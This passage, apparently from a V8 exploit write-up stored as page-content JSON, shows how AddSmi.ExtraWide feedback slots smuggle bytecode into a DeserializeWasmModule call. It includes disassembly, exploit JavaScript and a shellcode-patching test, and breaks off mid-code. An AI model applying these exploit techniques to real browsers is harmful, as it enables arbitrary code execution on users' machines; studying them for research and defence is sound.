code.",{"type":27,"tag":58,"props":1156,"children":1158},{"id":1157},"better-bytecode-control",[1159],{"type":33,"value":1160},"Better Bytecode Control",{"type":27,"tag":36,"props":1162,"children":1163},{},[1164,1166,1173,1175,1181],{"type":33,"value":1165},"Luckily, arithmetic instructions in Ignition have a feature known as the '",{"type":27,"tag":47,"props":1167,"children":1170},{"href":1168,"rel":1169},"https://benediktmeurer.de/2017/12/13/an-introduction-to-speculative-optimization-in-v8/",[51],[1171],{"type":33,"value":1172},"feedback vector slot",{"type":33,"value":1174},"', where it stores profiling information for subsequent optimizations by Turbofan. Observationally, for the ",{"type":27,"tag":84,"props":1176,"children":1178},{"className":1177},[],[1179],{"type":33,"value":1180},"AddSmi",{"type":33,"value":1182}," instruction, it represents the number of operations performed on the target value so far.",{"type":27,"tag":36,"props":1184,"children":1185},{},[1186],{"type":33,"value":1187},"For example, we can look at the below Ignition disassembly:",{"type":27,"tag":101,"props":1189,"children":1191},{"code":1190},"2000 : 01 0d 11 11 93 0e LdaSmi.ExtraWide [244519185]\n2006 : cd Star1\n2007 : 00 1b ff ff 1d ff Mov.Wide \u003Ccontext>, r220\n2013 : 0b f8 Ldar r1\n2015 : 01 4b 11 11 93 0a 01 00 00 00 AddSmi.ExtraWide [177410321], [1]\n2025 : 0b f8 Ldar r1\n2027 : 01 4b 11 11 93 0a 02 00 00 00 AddSmi.ExtraWide [177410321], [2]\n2037 : 0b f8 Ldar r1\n2039 : 01 4b 11 11 93 0a 03 00 00 00 AddSmi.ExtraWide [177410321], [3]\n2049 : 0b f8 Ldar r1\n2051 : 01 4b 11 11 93 0a 04 00 00 00 AddSmi.ExtraWide [177410321], [4]\n2061 : 0b f8 Ldar r1\n2063 : 01 4b 11 11 93 0a 05 00 00 00 AddSmi.ExtraWide [177410321], [5]\n",[1192],{"type":27,"tag":84,"props":1193,"children":1194},{"__ignoreMap":7},[1195],{"type":33,"value":1190},{"type":27,"tag":36,"props":1197,"children":1198},{},[1199,1201,1207],{"type":33,"value":1200},"We can see the feedback vector slot increments for every operation. This means that with a smuggled jump slide through ",{"type":27,"tag":84,"props":1202,"children":1204},{"className":1203},[],[1205],{"type":33,"value":1206},"AddSmi.ExtraWide",{"type":33,"value":1208},", we can control almost 8 bytes (because of the SMI constraint) given enough addition instructions.",{"type":27,"tag":36,"props":1210,"children":1211},{},[1212],{"type":33,"value":1213},"Eventually, we can reach a stage like this:",{"type":27,"tag":101,"props":1215,"children":1217},{"code":1216},"4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n",[1218],{"type":27,"tag":84,"props":1219,"children":1220},{"__ignoreMap":7},[1221],{"type":33,"value":1216},{"type":27,"tag":36,"props":1223,"children":1224},{},[1225],{"type":33,"value":1226},"If you skip the first two bytes, you have",{"type":27,"tag":1228,"props":1229,"children":1230},"ul",{},[1231,1263],{"type":27,"tag":1232,"props":1233,"children":1234},"li",{},[1235,1240,1242,1247,1249,1255,1257],{"type":27,"tag":84,"props":1236,"children":1238},{"className":1237},[],[1239],{"type":33,"value":1023},{"type":33,"value":1241}," (0x6c) to ",{"type":27,"tag":84,"props":1243,"children":1245},{"className":1244},[],[1246],{"type":33,"value":1039},{"type":33,"value":1248}," (0x0266) starting from register ",{"type":27,"tag":84,"props":1250,"children":1252},{"className":1251},[],[1253],{"type":33,"value":1254},"a2",{"type":33,"value":1256}," (0x4) with 2 arguments (0x2). This becomes the call: ",{"type":27,"tag":84,"props":1258,"children":1260},{"className":1259},[],[1261],{"type":33,"value":1262},"DeserializeWasmModule(a2, a1)",{"type":27,"tag":1232,"props":1264,"children":1265},{},[1266],{"type":33,"value":1267},"a Jump instruction",{"type":27,"tag":58,"props":1269,"children":1271},{"id":1270},"returning-back-to-js",[1272],{"type":33,"value":1273},"Returning Back to JS",{"type":27,"tag":36,"props":1275,"children":1276},{},[1277,1279,1285],{"type":33,"value":1278},"After that call, the result is stored in the accumulator. Since this function is an async generator, we have to ",{"type":27,"tag":84,"props":1280,"children":1282},{"className":1281},[],[1283],{"type":33,"value":1284},"yield",{"type":33,"value":1286}," the result, but that results in a long series of instructions that we can't possibly smuggle.",{"type":27,"tag":36,"props":1288,"children":1289},{},[1290],{"type":33,"value":1291},"The solution here is simple: we use the smuggled control flow to merge back into the normal control flow, that leads us into a yield from the original JS. For example, in our exploit, all the additions were done in a try block:",{"type":27,"tag":101,"props":1293,"children":1295},{"code":1294,"language":200,"meta":7,"className":201,"style":7},"try {\n ${'a1 + 0xa931111;'.repeat(0x059302 - 1)}\n a1 + 0x0402666c;\n throw 0x393e91a;\n} catch (e) {\n console.log(\"foo\");\n yield a16;\n}\n",[1296],{"type":27,"tag":84,"props":1297,"children":1298},{"__ignoreMap":7},[1299,1310,1362,1384,1400,1425,1456,1473],{"type":27,"tag":207,"props":1300,"children":1301},{"class":209,"line":210},[1302,1306],{"type":27,"tag":207,"props":1303,"children":1304},{"style":376},[1305],{"type":33,"value":379},{"type":27,"tag":207,"props":1307,"children":1308},{"style":238},[1309],{"type":33,"value":384},{"type":27,"tag":207,"props":1311,"children":1312},{"class":209,"line":244},[1313,1318,1323,1329,1333,1339,1344,1349,1353,1357],{"type":27,"tag":207,"props":1314,"children":1315},{"style":220},[1316],{"type":33,"value":1317}," $",{"type":27,"tag":207,"props":1319,"children":1320},{"style":238},[1321],{"type":33,"value":1322},"{",{"type":27,"tag":207,"props":1324,"children":1326},{"style":1325},"--shiki-default:#CE9178",[1327],{"type":33,"value":1328},"'a1 + 0xa931111;'",{"type":27,"tag":207,"props":1330,"children":1331},{"style":238},[1332],{"type":33,"value":1041},{"type":27,"tag":207,"props":1334,"children":1336},{"style":1335},"--shiki-default:#DCDCAA",[1337],{"type":33,"value":1338},"repeat",{"type":27,"tag":207,"props":1340,"children":1341},{"style":238},[1342],{"type":33,"value":1343},"(",{"type":27,"tag":207,"props":1345,"children":1346},{"style":232},[1347],{"type":33,"value":1348},"0x059302",{"type":27,"tag":207,"props":1350,"children":1351},{"style":226},[1352],{"type":33,"value":544},{"type":27,"tag":207,"props":1354,"children":1355},{"style":232},[1356],{"type":33,"value":235},{"type":27,"tag":207,"props":1358,"children":1359},{"style":238},[1360],{"type":33,"value":1361},")}\n",{"type":27,"tag":207,"props":1363,"children":1364},{"class":209,"line":270},[1365,1370,1375,1380],{"type":27,"tag":207,"props":1366,"children":1367},{"style":220},[1368],{"type":33,"value":1369}," a1",{"type":27,"tag":207,"props":1371,"children":1372},{"style":226},[1373],{"type":33,"value":1374}," +",{"type":27,"tag":207,"props":1376,"children":1377},{"style":232},[1378],{"type":33,"value":1379}," 0x0402666c",{"type":27,"tag":207,"props":1381,"children":1382},{"style":238},[1383],{"type":33,"value":241},{"type":27,"tag":207,"props":1385,"children":1386},{"class":209,"line":296},[1387,1391,1396],{"type":27,"tag":207,"props":1388,"children":1389},{"style":376},[1390],{"type":33,"value":392},{"type":27,"tag":207,"props":1392,"children":1393},{"style":232},[1394],{"type":33,"value":1395}," 0x393e91a",{"type":27,"tag":207,"props":1397,"children":1398},{"style":238},[1399],{"type":33,"value":241},{"type":27,"tag":207,"props":1401,"children":1402},{"class":209,"line":445},[1403,1407,1411,1415,1420],{"type":27,"tag":207,"props":1404,"children":1405},{"style":238},[1406],{"type":33,"value":408},{"type":27,"tag":207,"props":1408,"children":1409},{"style":376},[1410],{"type":33,"value":413},{"type":27,"tag":207,"props":1412,"children":1413},{"style":238},[1414],{"type":33,"value":686},{"type":27,"tag":207,"props":1416,"children":1417},{"style":220},[1418],{"type":33,"value":1419},"e",{"type":27,"tag":207,"props":1421,"children":1422},{"style":238},[1423],{"type":33,"value":1424},") {\n",{"type":27,"tag":207,"props":1426,"children":1427},{"class":209,"line":867},[1428,1433,1437,1442,1446,1451],{"type":27,"tag":207,"props":1429,"children":1430},{"style":220},[1431],{"type":33,"value":1432}," console",{"type":27,"tag":207,"props":1434,"children":1435},{"style":238},[1436],{"type":33,"value":1041},{"type":27,"tag":207,"props":1438,"children":1439},{"style":1335},[1440],{"type":33,"value":1441},"log",{"type":27,"tag":207,"props":1443,"children":1444},{"style":238},[1445],{"type":33,"value":1343},{"type":27,"tag":207,"props":1447,"children":1448},{"style":1325},[1449],{"type":33,"value":1450},"\"foo\"",{"type":27,"tag":207,"props":1452,"children":1453},{"style":238},[1454],{"type":33,"value":1455},");\n",{"type":27,"tag":207,"props":1457,"children":1458},{"class":209,"line":892},[1459,1464,1469],{"type":27,"tag":207,"props":1460,"children":1461},{"style":376},[1462],{"type":33,"value":1463}," yield",{"type":27,"tag":207,"props":1465,"children":1466},{"style":220},[1467],{"type":33,"value":1468}," a16",{"type":27,"tag":207,"props":1470,"children":1471},{"style":238},[1472],{"type":33,"value":241},{"type":27,"tag":207,"props":1474,"children":1476},{"class":209,"line":1475},8,[1477],{"type":27,"tag":207,"props":1478,"children":1479},{"style":238},[1480],{"type":33,"value":451},{"type":27,"tag":36,"props":1482,"children":1483},{},[1484,1486],{"type":33,"value":1485},"Starting from the final ",{"type":27,"tag":84,"props":1487,"children":1489},{"className":1488},[],[1490],{"type":33,"value":1180},{"type":27,"tag":101,"props":1492,"children":1494},{"code":1493}," 4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n 4385784 : 01 0d 1a e9 93 03 LdaSmi.ExtraWide [60025114]\n 4385790 : b1 Throw\n 4385791 : 00 1a 1a ff Star.Wide r223\n",[1495],{"type":27,"tag":84,"props":1496,"children":1497},{"__ignoreMap":7},[1498],{"type":33,"value":1493},{"type":27,"tag":36,"props":1500,"children":1501},{},[1502,1504,1509,1511,1517],{"type":33,"value":1503},"The smuggled jump in ",{"type":27,"tag":84,"props":1505,"children":1507},{"className":1506},[],[1508],{"type":33,"value":1180},{"type":33,"value":1510}," will redirect us to ",{"type":27,"tag":84,"props":1512,"children":1514},{"className":1513},[],[1515],{"type":33,"value":1516},"1a e9 93 03",{"type":33,"value":1518},", which results in:",{"type":27,"tag":1228,"props":1520,"children":1521},{},[1522,1533],{"type":27,"tag":1232,"props":1523,"children":1524},{},[1525,1531],{"type":27,"tag":84,"props":1526,"children":1528},{"className":1527},[],[1529],{"type":33,"value":1530},"Star r16",{"type":33,"value":1532}," (store accumulator to r16)",{"type":27,"tag":1232,"props":1534,"children":1535},{},[1536,1541],{"type":27,"tag":84,"props":1537,"children":1539},{"className":1538},[],[1540],{"type":33,"value":938},{"type":33,"value":1542}," past the throw into the catch relevant code",{"type":27,"tag":36,"props":1544,"children":1545},{},[1546,1548,1554],{"type":33,"value":1547},"This will bring us nicely to the final ",{"type":27,"tag":84,"props":1549,"children":1551},{"className":1550},[],[1552],{"type":33,"value":1553},"yield a16",{"type":33,"value":1555},", and we now have a Deserialized Wasm Module with our own arbitrary machine code.",{"type":27,"tag":58,"props":1557,"children":1559},{"id":1558},"executing-shellcode",[1560],{"type":33,"value":1561},"Executing Shellcode",{"type":27,"tag":36,"props":1563,"children":1564},{},[1565],{"type":33,"value":1566},"To test this, we first serialize a small WebAssembly module and print the resulting Uint8Array:",{"type":27,"tag":101,"props":1568,"children":1572},{"code":1569,"language":1570,"meta":7,"className":1571,"style":7},"var wasm_code = new Uint8Array([\n 0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n 0, 0, 10, 4, 1, 2, 0, 11,\n]);\nvar mod = new WebAssembly.Module(wasm_code);\nvar inst = new WebAssembly.Instance(mod);\nvar func = inst.exports.shell;\n\n%WasmTierUpFunction(func);\nvar serialized = %SerializeWasmModule(mod);\nlet result = new Uint8Array(serialized);\nconsole.log('[' + result.join(', ') + ']');\n","javascript","language-javascript shiki shiki-themes slack-dark",[1573],{"type":27,"tag":84,"props":1574,"children":1575},{"__ignoreMap":7},[1576,1608,1843,1912,1920,1967,2013,2055,2063,2090,2128,2166],{"type":27,"tag":207,"props":1577,"children":1578},{"class":209,"line":210},[1579,1584,1589,1593,1598,1603],{"type":27,"tag":207,"props":1580,"children":1581},{"style":214},[1582],{"type":33,"value":1583},"var",{"type":27,"tag":207,"props":1585,"children":1586},{"style":220},[1587],{"type":33,"value":1588}," wasm_code",{"type":27,"tag":207,"props":1590,"children":1591},{"style":226},[1592],{"type":33,"value":229},{"type":27,"tag":207,"props":1594,"children":1595},{"style":214},[1596],{"type":33,"value":1597}," new",{"type":27,"tag":207,"props":1599,"children":1600},{"style":1335},[1601],{"type":33,"value":1602}," Uint8Array",{"type":27,"tag":207,"props":1604,"children":1605},{"style":238},[1606],{"type":33,"value":1607},"([\n",{"type":27,"tag":207,"props":1609,"children":1610},{"class":209,"line":244},[1611,1616,1620,1625,1629,1634,1638,1643,1647,1652,1656,1661,1665,1669,1673,1677,1681,1685,1689,1694,1698,1702,1706,1711,1715,1719,1723,1727,1731,1736,1740,1745,1749,1753,1757,1761,1765,1770,1774,1779,1783,1787,1791,1795,1799,1803,1807,1812,1816,1821,1825,1830,1834,1838],{"type":27,"tag":207,"props":1612,"children":1613},{"style":232},[1614],{"type":33,"value":1615}," 0",{"type":27,"tag":207,"props":1617,"children":1618},{"style":238},[1619],{"type":33,"value":1123},{"type":27,"tag":207,"props":1621,"children":1622},{"style":232},[1623],{"type":33,"value":1624},"97",{"type":27,"tag":207,"props":1626,"children":1627},{"style":238},[1628],{"type":33,"value":1123},{"type":27,"tag":207,"props":1630,"children":1631},{"style":232},[1632],{"type":33,"value":1633},"115",{"type":27,"tag":207,"props":1635,"children":1636},{"style":238},[1637],{"type":33,"value":1123},{"type":27,"tag":207,"props":1639,"children":1640},{"style":232},[1641],{"type":33,"value":1642},"109",{"type":27,"tag":207,"props":1644,"children":1645},{"style":238},[1646],{"type":33,"value":1123},{"type":27,"tag":207,"props":1648,"children":1649},{"style":232},[1650],{"type":33,"value":1651},"1",{"type":27,"tag":207,"props":1653,"children":1654},{"style":238},[1655],{"type":33,"value":1123},{"type":27,"tag":207,"props":1657,"children":1658},{"style":232},[1659],{"type":33,"value":1660},"0",{"type":27,"tag":207,"props":1662,"children":1663},{"style":238},[1664],{"type":33,"value":1123},{"type":27,"tag":207,"props":1666,"children":1667},{"style":232},[1668],{"type":33,"value":1660},{"type":27,"tag":207,"props":1670,"children":1671},{"style":238},[1672],{"type":33,"value":1123},{"type":27,"tag":207,"props":1674,"children":1675},{"style":232},[1676],{"type":33,"value":1660},{"type":27,"tag":207,"props":1678,"children":1679},{"style":238},[1680],{"type":33,"value":1123},{"type":27,"tag":207,"props":1682,"children":1683},{"style":232},[1684],{"type":33,"value":1651},{"type":27,"tag":207,"props":1686,"children":1687},{"style":238},[1688],{"type":33,"value":1123},{"type":27,"tag":207,"props":1690,"children":1691},{"style":232},[1692],{"type":33,"value":1693},"4",{"type":27,"tag":207,"props":1695,"children":1696},{"style":238},[1697],{"type":33,"value":1123},{"type":27,"tag":207,"props":1699,"children":1700},{"style":232},[1701],{"type":33,"value":1651},{"type":27,"tag":207,"props":1703,"children":1704},{"style":238},[1705],{"type":33,"value":1123},{"type":27,"tag":207,"props":1707,"children":1708},{"style":232},[1709],{"type":33,"value":1710},"96",{"type":27,"tag":207,"props":1712,"children":1713},{"style":238},[1714],{"type":33,"value":1123},{"type":27,"tag":207,"props":1716,"children":1717},{"style":232},[1718],{"type":33,"value":1660},{"type":27,"tag":207,"props":1720,"children":1721},{"style":238},[1722],{"type":33,"value":1123},{"type":27,"tag":207,"props":1724,"children":1725},{"style":232},[1726],{"type":33,"value":1660},{"type":27,"tag":207,"props":1728,"children":1729},{"style":238},[1730],{"type":33,"value":1123},{"type":27,"tag":207,"props":1732,"children":1733},{"style":232},[1734],{"type":33,"value":1735},"3",{"type":27,"tag":207,"props":1737,"children":1738},{"style":238},[1739],{"type":33,"value":1123},{"type":27,"tag":207,"props":1741,"children":1742},{"style":232},[1743],{"type":33,"value":1744},"2",{"type":27,"tag":207,"props":1746,"children":1747},{"style":238},[1748],{"type":33,"value":1123},{"type":27,"tag":207,"props":1750,"children":1751},{"style":232},[1752],{"type":33,"value":1651},{"type":27,"tag":207,"props":1754,"children":1755},{"style":238},[1756],{"type":33,"value":1123},{"type":27,"tag":207,"props":1758,"children":1759},{"style":232},[1760],{"type":33,"value":1660},{"type":27,"tag":207,"props":1762,"children":1763},{"style":238},[1764],{"type":33,"value":1123},{"type":27,"tag":207,"props":1766,"children":1767},{"style":232},[1768],{"type":33,"value":1769},"7",{"type":27,"tag":207,"props":1771,"children":1772},{"style":238},[1773],{"type":33,"value":1123},{"type":27,"tag":207,"props":1775,"children":1776},{"style":232},[1777],{"type":33,"value":1778},"9",{"type":27,"tag":207,"props":1780,"children":1781},{"style":238},[1782],{"type":33,"value":1123},{"type":27,"tag":207,"props":1784,"children":1785},{"style":232},[1786],{"type":33,"value":1651},{"type":27,"tag":207,"props":1788,"children":1789},{"style":238},[1790],{"type":33,"value":1123},{"type":27,"tag":207,"props":1792,"children":1793},{"style":232},[1794],{"type":33,"value":1152},{"type":27,"tag":207,"props":1796,"children":1797},{"style":238},[1798],{"type":33,"value":1123},{"type":27,"tag":207,"props":1800,"children":1801},{"style":232},[1802],{"type":33,"value":1633},{"type":27,"tag":207,"props":1804,"children":1805},{"style":238},[1806],{"type":33,"value":1123},{"type":27,"tag":207,"props":1808,"children":1809},{"style":232},[1810],{"type":33,"value":1811},"104",{"type":27,"tag":207,"props":1813,"children":1814},{"style":238},[1815],{"type":33,"value":1123},{"type":27,"tag":207,"props":1817,"children":1818},{"style":232},[1819],{"type":33,"value":1820},"101",{"type":27,"tag":207,"props":1822,"children":1823},{"style":238},[1824],{"type":33,"value":1123},{"type":27,"tag":207,"props":1826,"children":1827},{"style":232},[1828],{"type":33,"value":1829},"108",{"type":27,"tag":207,"props":1831,"children":1832},{"style":238},[1833],{"type":33,"value":1123},{"type":27,"tag":207,"props":1835,"children":1836},{"style":232},[1837],{"type":33,"value":1829},{"type":27,"tag":207,"props":1839,"children":1840},{"style":238},[1841],{"type":33,"value":1842},",\n",{"type":27,"tag":207,"props":1844,"children":1845},{"class":209,"line":270},[1846,1850,1854,1858,1862,1867,1871,1875,1879,1883,1887,1891,1895,1899,1903,1908],{"type":27,"tag":207,"props":1847,"children":1848},{"style":232},[1849],{"type":33,"value":1615},{"type":27,"tag":207,"props":1851,"children":1852},{"style":238},[1853],{"type":33,"value":1123},{"type":27,"tag":207,"props":1855,"children":1856},{"style":232},[1857],{"type":33,"value":1660},{"type":27,"tag":207,"props":1859,"children":1860},{"style":238},[1861],{"type":33,"value":1123},{"type":27,"tag":207,"props":1863,"children":1864},{"style":232},[1865],{"type":33,"value":1866},"10",{"type":27,"tag":207,"props":1868,"children":1869},{"style":238},[1870],{"type":33,"value":1123},{"type":27,"tag":207,"props":1872,"children":1873},{"style":232},[1874],{"type":33,"value":1693},{"type":27,"tag":207,"props":1876,"children":1877},{"style":238},[1878],{"type":33,"value":1123},{"type":27,"tag":207,"props":1880,"children":1881},{"style":232},[1882],{"type":33,"value":1651},{"type":27,"tag":207,"props":1884,"children":1885},{"style":238},[1886],{"type":33,"value":1123},{"type":27,"tag":207,"props":1888,"children":1889},{"style":232},[1890],{"type":33,"value":1744},{"type":27,"tag":207,"props":1892,"children":1893},{"style":238},[1894],{"type":33,"value":1123},{"type":27,"tag":207,"props":1896,"children":1897},{"style":232},[1898],{"type":33,"value":1660},{"type":27,"tag":207,"props":1900,"children":1901},{"style":238},[1902],{"type":33,"value":1123},{"type":27,"tag":207,"props":1904,"children":1905},{"style":232},[1906],{"type":33,"value":1907},"11",{"type":27,"tag":207,"props":1909,"children":1910},{"style":238},[1911],{"type":33,"value":1842},{"type":27,"tag":207,"props":1913,"children":1914},{"class":209,"line":296},[1915],{"type":27,"tag":207,"props":1916,"children":1917},{"style":238},[1918],{"type":33,"value":1919},"]);\n",{"type":27,"tag":207,"props":1921,"children":1922},{"class":209,"line":445},[1923,1927,1932,1936,1940,1945,1949,1954,1958,1963],{"type":27,"tag":207,"props":1924,"children":1925},{"style":214},[1926],{"type":33,"value":1583},{"type":27,"tag":207,"props":1928,"children":1929},{"style":220},[1930],{"type":33,"value":1931}," mod",{"type":27,"tag":207,"props":1933,"children":1934},{"style":226},[1935],{"type":33,"value":229},{"type":27,"tag":207,"props":1937,"children":1938},{"style":214},[1939],{"type":33,"value":1597},{"type":27,"tag":207,"props":1941,"children":1942},{"style":220},[1943],{"type":33,"value":1944}," WebAssembly",{"type":27,"tag":207,"props":1946,"children":1947},{"style":238},[1948],{"type":33,"value":1041},{"type":27,"tag":207,"props":1950,"children":1951},{"style":1335},[1952],{"type":33,"value":1953},"Module",{"type":27,"tag":207,"props":1955,"children":1956},{"style":238},[1957],{"type":33,"value":1343},{"type":27,"tag":207,"props":1959,"children":1960},{"style":220},[1961],{"type":33,"value":1962},"wasm_code",{"type":27,"tag":207,"props":1964,"children":1965},{"style":238},[1966],{"type":33,"value":1455},{"type":27,"tag":207,"props":1968,"children":1969},{"class":209,"line":867},[1970,1974,1979,1983,1987,1991,1995,2000,2004,2009],{"type":27,"tag":207,"props":1971,"children":1972},{"style":214},[1973],{"type":33,"value":1583},{"type":27,"tag":207,"props":1975,"children":1976},{"style":220},[1977],{"type":33,"value":1978}," inst",{"type":27,"tag":207,"props":1980,"children":1981},{"style":226},[1982],{"type":33,"value":229},{"type":27,"tag":207,"props":1984,"children":1985},{"style":214},[1986],{"type":33,"value":1597},{"type":27,"tag":207,"props":1988,"children":1989},{"style":220},[1990],{"type":33,"value":1944},{"type":27,"tag":207,"props":1992,"children":1993},{"style":238},[1994],{"type":33,"value":1041},{"type":27,"tag":207,"props":1996,"children":1997},{"style":1335},[1998],{"type":33,"value":1999},"Instance",{"type":27,"tag":207,"props":2001,"children":2002},{"style":238},[2003],{"type":33,"value":1343},{"type":27,"tag":207,"props":2005,"children":2006},{"style":220},[2007],{"type":33,"value":2008},"mod",{"type":27,"tag":207,"props":2010,"children":2011},{"style":238},[2012],{"type":33,"value":1455},{"type":27,"tag":207,"props":2014,"children":2015},{"class":209,"line":892},[2016,2020,2025,2029,2033,2037,2042,2046,2051],{"type":27,"tag":207,"props":2017,"children":2018},{"style":214},[2019],{"type":33,"value":1583},{"type":27,"tag":207,"props":2021,"children":2022},{"style":220},[2023],{"type":33,"value":2024}," func",{"type":27,"tag":207,"props":2026,"children":2027},{"style":226},[2028],{"type":33,"value":229},{"type":27,"tag":207,"props":2030,"children":2031},{"style":220},[2032],{"type":33,"value":1978},{"type":27,"tag":207,"props":2034,"children":2035},{"style":238},[2036],{"type":33,"value":1041},{"type":27,"tag":207,"props":2038,"children":2039},{"style":220},[2040],{"type":33,"value":2041},"exports",{"type":27,"tag":207,"props":2043,"children":2044},{"style":238},[2045],{"type":33,"value":1041},{"type":27,"tag":207,"props":2047,"children":2048},{"style":220},[2049],{"type":33,"value":2050},"shell",{"type":27,"tag":207,"props":2052,"children":2053},{"style":238},[2054],{"type":33,"value":241},{"type":27,"tag":207,"props":2056,"children":2057},{"class":209,"line":1475},[2058],{"type":27,"tag":207,"props":2059,"children":2060},{"emptyLinePlaceholder":19},[2061],{"type":33,"value":2062},"\n",{"type":27,"tag":207,"props":2064,"children":2066},{"class":209,"line":2065},9,[2067,2072,2077,2081,2086],{"type":27,"tag":207,"props":2068,"children":2069},{"style":226},[2070],{"type":33,"value":2071},"%",{"type":27,"tag":207,"props":2073,"children":2074},{"style":1335},[2075],{"type":33,"value":2076},"WasmTierUpFunction",{"type":27,"tag":207,"props":2078,"children":2079},{"style":238},[2080],{"type":33,"value":1343},{"type":27,"tag":207,"props":2082,"children":2083},{"style":220},[2084],{"type":33,"value":2085},"func",{"type":27,"tag":207,"props":2087,"children":2088},{"style":238},[2089],{"type":33,"value":1455},{"type":27,"tag":207,"props":2091,"children":2093},{"class":209,"line":2092},10,[2094,2098,2103,2107,2112,2116,2120,2124],{"type":27,"tag":207,"props":2095,"children":2096},{"style":214},[2097],{"type":33,"value":1583},{"type":27,"tag":207,"props":2099,"children":2100},{"style":220},[2101],{"type":33,"value":2102}," serialized",{"type":27,"tag":207,"props":2104,"children":2105},{"style":226},[2106],{"type":33,"value":229},{"type":27,"tag":207,"props":2108,"children":2109},{"style":226},[2110],{"type":33,"value":2111}," %",{"type":27,"tag":207,"props":2113,"children":2114},{"style":1335},[2115],{"type":33,"value":1067},{"type":27,"tag":207,"props":2117,"children":2118},{"style":238},[2119],{"type":33,"value":1343},{"type":27,"tag":207,"props":2121,"children":2122},{"style":220},[2123],{"type":33,"value":2008},{"type":27,"tag":207,"props":2125,"children":2126},{"style":238},[2127],{"type":33,"value":1455},{"type":27,"tag":207,"props":2129,"children":2131},{"class":209,"line":2130},11,[2132,2136,2141,2145,2149,2153,2157,2162],{"type":27,"tag":207,"props":2133,"children":2134},{"style":214},[2135],{"type":33,"value":217},{"type":27,"tag":207,"props":2137,"children":2138},{"style":220},[2139],{"type":33,"value":2140}," result",{"type":27,"tag":207,"props":2142,"children":2143},{"style":226},[2144],{"type":33,"value":229},{"type":27,"tag":207,"props":2146,"children":2147},{"style":214},[2148],{"type":33,"value":1597},{"type":27,"tag":207,"props":2150,"children":2151},{"style":1335},[2152],{"type":33,"value":1602},{"type":27,"tag":207,"props":2154,"children":2155},{"style":238},[2156],{"type":33,"value":1343},{"type":27,"tag":207,"props":2158,"children":2159},{"style":220},[2160],{"type":33,"value":2161},"serialized",{"type":27,"tag":207,"props":2163,"children":2164},{"style":238},[2165],{"type":33,"value":1455},{"type":27,"tag":207,"props":2167,"children":2169},{"class":209,"line":2168},12,[2170,2175,2179,2183,2187,2192,2196,2200,2204,2209,2213,2218,2223,2228,2233],{"type":27,"tag":207,"props":2171,"children":2172},{"style":220},[2173],{"type":33,"value":2174},"console",{"type":27,"tag":207,"props":2176,"children":2177},{"style":238},[2178],{"type":33,"value":1041},{"type":27,"tag":207,"props":2180,"children":2181},{"style":1335},[2182],{"type":33,"value":1441},{"type":27,"tag":207,"props":2184,"children":2185},{"style":238},[2186],{"type":33,"value":1343},{"type":27,"tag":207,"props":2188,"children":2189},{"style":1325},[2190],{"type":33,"value":2191},"'['",{"type":27,"tag":207,"props":2193,"children":2194},{"style":226},[2195],{"type":33,"value":1374},{"type":27,"tag":207,"props":2197,"children":2198},{"style":220},[2199],{"type":33,"value":2140},{"type":27,"tag":207,"props":2201,"children":2202},{"style":238},[2203],{"type":33,"value":1041},{"type":27,"tag":207,"props":2205,"children":2206},{"style":1335},[2207],{"type":33,"value":2208},"join",{"type":27,"tag":207,"props":2210,"children":2211},{"style":238},[2212],{"type":33,"value":1343},{"type":27,"tag":207,"props":2214,"children":2215},{"style":1325},[2216],{"type":33,"value":2217},"', '",{"type":27,"tag":207,"props":2219,"children":2220},{"style":238},[2221],{"type":33,"value":2222},") ",{"type":27,"tag":207,"props":2224,"children":2225},{"style":226},[2226],{"type":33,"value":2227},"+",{"type":27,"tag":207,"props":2229,"children":2230},{"style":1325},[2231],{"type":33,"value":2232}," ']'",{"type":27,"tag":207,"props":2234,"children":2235},{"style":238},[2236],{"type":33,"value":1455},{"type":27,"tag":36,"props":2238,"children":2239},{},[2240],{"type":33,"value":2241},"This produces the following output:",{"type":27,"tag":101,"props":2243,"children":2245},{"code":2244},"[147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 85, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93, 195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0]\n",[2246],{"type":27,"tag":84,"props":2247,"children":2248},{"__ignoreMap":7},[2249],{"type":33,"value":2244},{"type":27,"tag":36,"props":2251,"children":2252},{},[2253,2255,2261,2263,2269,2271,2277,2279,2285,2287,2292],{"type":33,"value":2254},"The bytes ",{"type":27,"tag":84,"props":2256,"children":2258},{"className":2257},[],[2259],{"type":33,"value":2260},"85, 72, 137, 229, ...",{"type":33,"value":2262}," correspond to the x86-64 function prologue (",{"type":27,"tag":84,"props":2264,"children":2266},{"className":2265},[],[2267],{"type":33,"value":2268},"push rbp; mov rbp, rsp",{"type":33,"value":2270},"). We replace the first byte with ",{"type":27,"tag":84,"props":2272,"children":2274},{"className":2273},[],[2275],{"type":33,"value":2276},"0xcc",{"type":33,"value":2278}," (the ",{"type":27,"tag":84,"props":2280,"children":2282},{"className":2281},[],[2283],{"type":33,"value":2284},"int3",{"type":33,"value":2286}," opcode), and use this modified buffer as the serialized input to ",{"type":27,"tag":84,"props":2288,"children":2290},{"className":2289},[],[2291],{"type":33,"value":1039},{"type":33,"value":736},{"type":27,"tag":101,"props":2294,"children":2296},{"code":2295,"language":1570,"meta":7,"className":1571,"style":7},"(async () => {\n const wasm_code = new Uint8Array([\n 0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n 0, 0, 10, 4, 